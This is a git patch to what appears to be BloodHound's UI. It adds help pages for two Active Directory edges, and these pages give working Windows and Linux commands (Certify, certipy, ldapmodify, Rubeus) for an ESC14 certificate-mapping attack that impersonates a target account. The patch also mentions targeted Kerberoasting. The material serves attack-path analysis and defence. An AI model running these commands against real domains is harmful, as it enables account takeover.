mapping string to the 'altSecurityIdentities' attribute + of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\\nchangetype: modify\\nadd: altSecurityIdentities\\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + Verify the that the mapping was added using ldapsearch: + + { + 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' + } + + Step 4: Authenticate as target + + Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the certificate and the + IP of a DC: + + {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} + Step 5: Remove certificate mapping on target (clean-up) + + After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping string from + the ‘altSecurityIdentities’ attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\\nchangetype: modify\\ndelete: altSecurityIdentities\\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + + ); +}; + +export default LinuxAbuse; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/Opsec.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/Opsec.tsx new file mode 100644 index 00000000000..d3b06051154 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/Opsec.tsx @@ -0,0 +1,33 @@ +// Copyright 2025 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { Typography } from '@mui/material'; +import { FC } from 'react'; + +const Opsec: FC = () => { + return ( + <> + + When the affected certificate authority issues the certificate to the attacker, it will retain a local + copy of that certificate in its issued certificates store. Defenders may analyze those issued + certificates to identify illegitimately issued certificates and identify the principal that requested + the certificate. + + + ); +}; + +export default Opsec; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/References.tsx new file mode 100644 index 00000000000..eea50765b34 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/References.tsx @@ -0,0 +1,99 @@ +// Copyright 2025 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { Box, Link } from '@mui/material'; +import { FC } from 'react'; + +const References: FC = () => { + return ( + + + MITRE ATT&CK - Account Manipulation + +
+ + ADCS ESC14 Abuse Technique + +
+ + Certified Pre-Owned - Abusing Active Directory Certificate Services + +
+ + How to disable the Subject Alternative Name for UPN mapping + +
+ + Certipy + +
+ + Certify + +
+ + Rubeus + +
+ + Add-AltSecIDMapping.ps1 + +
+ + Get-AltSecIDMapping.ps1 + +
+ + Remove-AltSecIDMapping.ps1 + +
+ + ldapsearch + +
+ + ldapmodify + +
+ + certutil + + + ); +}; + +export default References; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/WindowsAbuse.tsx new file mode 100644 index 00000000000..d17034991d3 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/WindowsAbuse.tsx @@ -0,0 +1,136 @@ +// Copyright 2025 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { Link, Typography } from '@mui/material'; +import { FC } from 'react'; +import CodeController from '../CodeController/CodeController'; +import { EdgeInfoProps } from '../index'; + +const WindowsAbuse: FC = () => { + return ( + <> + + The write access to the AltSecurityIdentities may enable an ADCS ESC14 Scenario A attack. + + + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target referring + to a certificate in the attacker's possession, and then use this certificate to authenticate as the + target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry (UPN)
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the certificate + typically must be of a computer. By default, the ADCS certificate template Computer (Machine){' '} + meets these requirements and grants Domain Computers enrollment rights. The target can still be a + user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + Step 1: Obtain certificate + + Obtain a certificate meeting the above requirements for example by dumping a certificate from a + computer, or enrolling a new certificate as a computer: + + + { + 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is unavailable and + cannot be added to the Subject or Subject Alternate name, then it is because the enrollee principal does + not have their mail or dNSHostName attribute set, which is required by the certificate template. The + mail attribute can be set on both user and computer objects but the dNSHostName attribute can only be + set on computer objects. Computers have validated write permission to their own dNSHostName attribute by + default, but neither users nor computers can write to their own mail attribute by default. + + + Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the certificate + as a PFX file: + + {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} + Step 2: Get certificate mapping identifier + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or + X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate public key using certutil: + + {`certutil.exe -dump -v .\\cert.pfx +… +Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 +…`} + + Step 3: Add certificate mapping on target + + Use Add-AltSecIDMapping to add the explicit certificate mapping string to the 'altSecurityIdentities' + attribute of the target principal: + + + { + 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + Verify the that the mapping was added using Get-AltSecIDMapping: + + {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} + + Step 4: Authenticate as target + + Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target identity, + and the PFX-formatted certificate: + + + {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} + + Step 5: Remove certificate mapping on target (clean-up) + + After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit certificate mapping + string from the 'altSecurityIdentities' attribute of the target principal: + + + { + 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + + ); +}; + +export default WindowsAbuse; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/WriteAltSecurityIdentities.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/WriteAltSecurityIdentities.tsx new file mode 100644 index 00000000000..2ce28facffa --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/WriteAltSecurityIdentities.tsx @@ -0,0 +1,31 @@ +// Copyright 2025 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import General from './General'; +import LinuxAbuse from './LinuxAbuse'; +import Opsec from './Opsec'; +import References from './References'; +import WindowsAbuse from './WindowsAbuse'; + +const WriteAltSecurityIdentities = { + general: General, + windowsAbuse: WindowsAbuse, + linuxAbuse: LinuxAbuse, + opsec: Opsec, + references: References, +}; + +export default WriteAltSecurityIdentities; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/General.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/General.tsx new file mode 100644 index 00000000000..b1ca6aa4534 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/General.tsx @@ -0,0 +1,39 @@ +// Copyright 2025 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { Typography } from '@mui/material'; +import { FC } from 'react'; +import { EdgeInfoProps } from '../index'; +import { groupSpecialFormat, typeFormat } from '../utils'; + +const General: FC = ({ sourceName, sourceType, targetName, targetType }) => { + return ( + <> + + {groupSpecialFormat(sourceType, sourceName)} the ability to write to the Public-Information property set + of the {typeFormat(targetType)} {targetName}. + + + + The Public-Information property set includes the altSecurityIdentities attribute, which allow you to + specify explicit certificate mappings for a principal. An explicit certificate mapping is a + reference to a certificate, which can be used to authenticate as the principal. + + + ); +}; + +export default General; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/LinuxAbuse.tsx new file mode 100644 index 00000000000..66fff611b33 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/LinuxAbuse.tsx @@ -0,0 +1,128 @@ +// Copyright 2025 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { Link, Typography } from '@mui/material'; +import { FC } from 'react'; +import CodeController from '../CodeController/CodeController'; +import { EdgeInfoProps } from '../index'; + +const LinuxAbuse: FC = () => { + return ( + <> + + The write access to the AltSecurityIdentities may enable an ADCS ESC14 Scenario A attack. + + + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target referring + to a certificate in the attacker's possession, and then use this certificate to authenticate as the + target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry (UPN)
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the certificate + typically must be of a computer. By default, the ADCS certificate template Computer (Machine){' '} + meets these requirements and grants Domain Computers enrollment rights. The target can still be a + user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + Step 1: Obtain certificate + + Obtain a certificate meeting the above requirements for example by dumping a certificate from a + computer, or enrolling a new certificate as a computer: + + + {'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14'} + + + If the enrollment fails with an error message stating that the Email or DNS name is unavailable and + cannot be added to the Subject or Subject Alternate name, then it is because the enrollee principal does + not have their mail or dNSHostName attribute set, which is required by the certificate template. The + mail attribute can be set on both user and computer objects but the dNSHostName attribute can only be + set on computer objects. Computers have validated write permission to their own dNSHostName attribute by + default, but neither users nor computers can write to their own mail attribute by default. + + Step 2: Get certificate mapping identifier + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or + X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate using openssl: + + {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' +… +sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} + + Step 3: Add certificate mapping on target + + Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' attribute + of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\\nchangetype: modify\\nadd: altSecurityIdentities\\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + Verify the that the mapping was added using ldapsearch: + + { + 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' + } + + Step 4: Authenticate as target + + Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the certificate and the + IP of a DC: + + {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} + Step 5: Remove certificate mapping on target (clean-up) + + After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping string from + the ‘altSecurityIdentities’ attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\\nchangetype: modify\\ndelete: altSecurityIdentities\\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + + ); +}; + +export default LinuxAbuse; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/Opsec.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/Opsec.tsx new file mode 100644 index 00000000000..d3b06051154 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/Opsec.tsx @@ -0,0 +1,33 @@ +// Copyright 2025 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { Typography } from '@mui/material'; +import { FC } from 'react'; + +const Opsec: FC = () => { + return ( + <> + + When the affected certificate authority issues the certificate to the attacker, it will retain a local + copy of that certificate in its issued certificates store. Defenders may analyze those issued + certificates to identify illegitimately issued certificates and identify the principal that requested + the certificate. + + + ); +}; + +export default Opsec; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/References.tsx new file mode 100644 index 00000000000..eea50765b34 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/References.tsx @@ -0,0 +1,99 @@ +// Copyright 2025 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { Box, Link } from '@mui/material'; +import { FC } from 'react'; + +const References: FC = () => { + return ( + + + MITRE ATT&CK - Account Manipulation + +
+ + ADCS ESC14 Abuse Technique + +
+ + Certified Pre-Owned - Abusing Active Directory Certificate Services + +
+ + How to disable the Subject Alternative Name for UPN mapping + +
+ + Certipy + +
+ + Certify + +
+ + Rubeus + +
+ + Add-AltSecIDMapping.ps1 + +
+ + Get-AltSecIDMapping.ps1 + +
+ + Remove-AltSecIDMapping.ps1 + +
+ + ldapsearch + +
+ + ldapmodify + +
+ + certutil + + + ); +}; + +export default References; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/WindowsAbuse.tsx new file mode 100644 index 00000000000..d17034991d3 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/WindowsAbuse.tsx @@ -0,0 +1,136 @@ +// Copyright 2025 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { Link, Typography } from '@mui/material'; +import { FC } from 'react'; +import CodeController from '../CodeController/CodeController'; +import { EdgeInfoProps } from '../index'; + +const WindowsAbuse: FC = () => { + return ( + <> + + The write access to the AltSecurityIdentities may enable an ADCS ESC14 Scenario A attack. + + + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target referring + to a certificate in the attacker's possession, and then use this certificate to authenticate as the + target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry (UPN)
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the certificate + typically must be of a computer. By default, the ADCS certificate template Computer (Machine){' '} + meets these requirements and grants Domain Computers enrollment rights. The target can still be a + user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + Step 1: Obtain certificate + + Obtain a certificate meeting the above requirements for example by dumping a certificate from a + computer, or enrolling a new certificate as a computer: + + + { + 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is unavailable and + cannot be added to the Subject or Subject Alternate name, then it is because the enrollee principal does + not have their mail or dNSHostName attribute set, which is required by the certificate template. The + mail attribute can be set on both user and computer objects but the dNSHostName attribute can only be + set on computer objects. Computers have validated write permission to their own dNSHostName attribute by + default, but neither users nor computers can write to their own mail attribute by default. + + + Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the certificate + as a PFX file: + + {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} + Step 2: Get certificate mapping identifier + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or + X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate public key using certutil: + + {`certutil.exe -dump -v .\\cert.pfx +… +Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 +…`} + + Step 3: Add certificate mapping on target + + Use Add-AltSecIDMapping to add the explicit certificate mapping string to the 'altSecurityIdentities' + attribute of the target principal: + + + { + 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + Verify the that the mapping was added using Get-AltSecIDMapping: + + {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} + + Step 4: Authenticate as target + + Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target identity, + and the PFX-formatted certificate: + + + {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} + + Step 5: Remove certificate mapping on target (clean-up) + + After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit certificate mapping + string from the 'altSecurityIdentities' attribute of the target principal: + + + { + 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + + ); +}; + +export default WindowsAbuse; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/WritePublicInformation.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/WritePublicInformation.tsx new file mode 100644 index 00000000000..63a7cd7e69c --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/WritePublicInformation.tsx @@ -0,0 +1,31 @@ +// Copyright 2025 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import General from './General'; +import LinuxAbuse from './LinuxAbuse'; +import Opsec from './Opsec'; +import References from './References'; +import WindowsAbuse from './WindowsAbuse'; + +const WritePublicInformation = { + general: General, + windowsAbuse: WindowsAbuse, + linuxAbuse: LinuxAbuse, + opsec: Opsec, + references: References, +}; + +export default WritePublicInformation; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx index afb0a51add3..44bf79c881b 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx @@ -133,6 +133,7 @@ import SyncedToADUser from './SyncedToADUser/SyncedToADUser'; import SyncedToEntraUser from './SyncedToEntraUser/SyncedToEntraUser'; import TrustedForNTAuth from './TrustedForNTAuth/TrustedForNTAuth'; import WriteAccountRestrictions from './WriteAccountRestrictions/WriteAccountRestrictions'; +import WriteAltSecurityIdentities from './WriteAltSecurityIdentities/WriteAltSecurityIdentities'; import WriteDacl from './WriteDacl/WriteDacl'; import WriteGPLink from './WriteGPLink/WriteGPLink'; import WriteOwner from './WriteOwner/WriteOwner'; @@ -140,6 +141,7 @@ import WriteOwnerLimitedRights from './WriteOwnerLimitedRights/WriteOwnerLimited import WriteOwnerRaw from './WriteOwnerRaw/WriteOwnerRaw'; import WritePKIEnrollmentFlag from './WritePKIEnrollmentFlag/WritePKIEnrollmentFlag'; import WritePKINameFlag from './WritePKINameFlag/WritePKINameFlag'; +import WritePublicInformation from './WritePublicInformation/WritePublicInformation'; import WriteSPN from './WriteSPN/WriteSPN'; export type EdgeInfoProps = { @@ -280,6 +282,8 @@ const EdgeInfoComponents = { CanApplyGPO: CanApplyGPO, GPOAppliesTo: GPOAppliesTo, HasTrustKeys: HasTrustKeys, + WriteAltSecurityIdentities: WriteAltSecurityIdentities, + WritePublicInformation: WritePublicInformation, }; export default EdgeInfoComponents; diff --git a/packages/javascript/bh-shared-ui/src/edgeTypes.tsx b/packages/javascript/bh-shared-ui/src/edgeTypes.tsx index d132f2f3ca6..dff27af9e44 100644 --- a/packages/javascript/bh-shared-ui/src/edgeTypes.tsx +++ b/packages/javascript/bh-shared-ui/src/edgeTypes.tsx @@ -97,7 +97,9 @@ export const AllEdgeTypes: Category[] = [ ActiveDirectoryRelationshipKind.AddKeyCredentialLink, ActiveDirectoryRelationshipKind.CanApplyGPO, ActiveDirectoryRelationshipKind.WriteAccountRestrictions, + ActiveDirectoryRelationshipKind.WriteAltSecurityIdentities, ActiveDirectoryRelationshipKind.WriteGPLink, + ActiveDirectoryRelationshipKind.WritePublicInformation, ActiveDirectoryRelationshipKind.WriteSPN, ], }, diff --git a/packages/javascript/bh-shared-ui/src/graphSchema.ts b/packages/javascript/bh-shared-ui/src/graphSchema.ts index 517353bab0c..f4697c6f9f7 100644 --- a/packages/javascript/bh-shared-ui/src/graphSchema.ts +++ b/packages/javascript/bh-shared-ui/src/graphSchema.ts @@ -155,6 +155,8 @@ export enum ActiveDirectoryRelationshipKind { GPOAppliesTo = 'GPOAppliesTo', CanApplyGPO = 'CanApplyGPO', HasTrustKeys = 'HasTrustKeys', + WriteAltSecurityIdentities = 'WriteAltSecurityIdentities', + WritePublicInformation = 'WritePublicInformation', } export function ActiveDirectoryRelationshipKindToDisplay(value: ActiveDirectoryRelationshipKind): string | undefined { switch (value) { @@ -328,6 +330,10 @@ export function ActiveDirectoryRelationshipKindToDisplay(value: ActiveDirectoryR return 'CanApplyGPO'; case ActiveDirectoryRelationshipKind.HasTrustKeys: return 'HasTrustKeys'; + case ActiveDirectoryRelationshipKind.WriteAltSecurityIdentities: + return 'WriteAltSecurityIdentities'; + case ActiveDirectoryRelationshipKind.WritePublicInformation: + return 'WritePublicInformation'; default: return undefined; } @@ -815,6 +821,8 @@ export function ActiveDirectoryPathfindingEdges(): ActiveDirectoryRelationshipKi ActiveDirectoryRelationshipKind.GPOAppliesTo, ActiveDirectoryRelationshipKind.CanApplyGPO, ActiveDirectoryRelationshipKind.HasTrustKeys, + ActiveDirectoryRelationshipKind.WriteAltSecurityIdentities, + ActiveDirectoryRelationshipKind.WritePublicInformation, ActiveDirectoryRelationshipKind.DCFor, ActiveDirectoryRelationshipKind.SameForestTrust, ActiveDirectoryRelationshipKind.SpoofSIDHistory, From c5bf6fe216650e03ca4f56d61408d24e8201a856 Mon Sep 17 00:00:00 2001 From: jknudsen Date: Fri, 20 Jun 2025 10:16:37 +0200 Subject: [PATCH 2/9] Add WriteSPN info under WritePublicInformation --- .../HelpTexts/WritePublicInformation/General.tsx | 4 ++++ .../HelpTexts/WritePublicInformation/LinuxAbuse.tsx | 8 ++++++++ .../HelpTexts/WritePublicInformation/WindowsAbuse.tsx | 8 ++++++++ 3 files changed, 20 insertions(+) diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/General.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/General.tsx index b1ca6aa4534..617f2107260 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/General.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/General.tsx @@ -32,6 +32,10 @@ const General: FC = ({ sourceName, sourceType, targetName, target specify explicit certificate mappings for a principal. An explicit certificate mapping is a reference to a certificate, which can be used to authenticate as the principal. + + + The servicePrincipalName (SPN) attribute is also included in the property set. + ); }; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/LinuxAbuse.tsx index 66fff611b33..cd9d6d9492a 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/LinuxAbuse.tsx @@ -25,6 +25,14 @@ const LinuxAbuse: FC = () => { The write access to the AltSecurityIdentities may enable an ADCS ESC14 Scenario A attack. + + Alternatively, the write access to the SPN enable a targeted Kerberoasting attack against user accounts + with a weak password. See the{' '} + + WriteSPN + {' '} + edge for more details. + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target referring to a certificate in the 